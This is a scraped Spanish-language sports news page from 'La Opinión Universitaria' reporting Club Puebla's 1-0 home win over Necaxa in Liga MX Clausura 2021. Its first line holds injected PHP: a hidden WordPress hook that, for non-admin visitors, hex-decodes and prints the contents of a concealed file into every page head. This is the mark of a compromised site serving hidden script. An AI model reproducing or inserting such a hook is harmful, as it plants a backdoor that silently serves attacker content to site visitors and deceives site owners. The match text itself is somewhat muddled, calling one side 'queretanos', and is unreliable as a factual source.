if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Club Puebla vence al Club Necaxa y se mete a puesto directos de liguilla en la Liga MX – La Opinión Universitaria La Opinión Universitaria
Menu

Club Puebla vence al Club Necaxa y se mete a puesto directos de liguilla en la Liga MX

La Franja del Puebla amanecerá en puestos directos de liguilla al imponerse en condición de local por marcador de 1-0 ante los Rayos del Necaxa, en la actividad de la jornada 8 de la Liga MX, en el presente torneo Clausura 2021.

Los queretanos tenían el triunfo en la bolsa hasta que Daniel Cervantes derribó a Guillermo Martínez en el área chica, pena máxima que el silbante Eduardo Galván marcó sin dudar. La Franja buscó la puerta rival con un remate de Javier Salas que se fue por un costado a pesar de haber superado la barrera.

El encuentro fue soso en el primer tiempo, cosa que cambió radicalmente para el complemento con vibrantes minutos y acciones en ambas áreas. La primera de peligro llegó al 58′ con un cabezazo de Salas que el arquero Luis Ángel Malagón tapó con un espectacular lance.